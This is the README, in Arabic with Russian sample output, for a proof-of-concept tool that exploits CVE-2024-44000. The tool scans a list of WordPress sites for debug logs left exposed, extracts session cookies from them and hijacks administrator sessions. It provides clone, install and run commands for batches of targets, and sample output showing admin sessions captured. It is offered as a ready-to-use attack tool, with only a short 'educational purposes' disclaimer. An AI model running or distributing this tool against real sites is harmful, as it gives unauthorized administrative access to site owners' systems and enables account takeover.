
هي أداة إثبات مفهوم (PoC) مصممة لاستغلال سجلات التصحيح المكشوفة بشكل غير آمن من مواقع ووردبريس (WordPress) واستخراج كعكات الجلسة.
GenCookieSessionHijack هي أداة PoC مصممة لاستغلال سجلات التصحيح المكشوفة بشكل غير آمن من مواقع WordPress واستخراج كعكات الجلسة. يتيح ذلك للمهاجم اختطاف جلسات المسؤول النشطة والحصول على وصول غير مصرح به إلى لوحة تحكم WordPress.
wordpress_logged_in).git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt).python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file: المسار إلى الملف الذي يحتوي على قائمة عناوين URL (الافتراضي: list.txt).-o, --output: الملف لحفظ النتائج (الافتراضي: result.txt).python GenCookieSessionHijack.py -f targets.txt -o output.txt
سيقرأ هذا قائمة عناوين URL من targets.txt، ويحاول استخراج واستخدام كعكات الجلسة، ويحفظ النتائج في output.txt.
إذا كانت محاولة اختطاف الجلسة ناجحة، ستقوم الأداة بإنشاء عنوان URL مع كعكة جلسة المسؤول المختطفة وفتحه مباشرة في المتصفح الافتراضي.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
هذه الأداة مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها في أنشطة غير قانونية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.